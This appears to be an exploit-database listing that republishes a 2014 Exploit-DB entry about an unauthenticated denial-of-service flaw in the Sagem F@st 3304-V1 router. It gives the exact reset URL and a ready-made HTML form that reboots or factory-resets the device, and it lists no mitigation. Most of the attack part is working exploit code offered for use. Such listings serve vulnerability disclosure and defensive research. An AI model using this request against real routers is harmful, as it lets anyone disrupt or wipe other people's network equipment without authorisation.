header-logo
Suggest Exploit
vendor:
Sagem F@st 3304-V1
by:
Z3ro0ne
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Sagem F@st 3304-V1
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Firefox, Google Chrome
2014

Sagem F@st 3304-V1 denial of service Vulnerability

The vulnerability allows unauthenticated users to remotely restart and reset the router. To reset the router without any authentication, execute the following URL http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the URL bar.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Title              : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage    : http://www.sagemcom.com
# Tested on          : Firefox, Google Chrome
# Tested Router      : Sagem F@st 3304-V1 
# Date               : 2014-07-26
# Author             : Z3ro0ne
# Contact            : saadousfar59@gmail.com
# Facebook Page      : https://www.facebook.com/Z3ro0ne

# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:

<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
  </FORM>
  <FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
  </FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar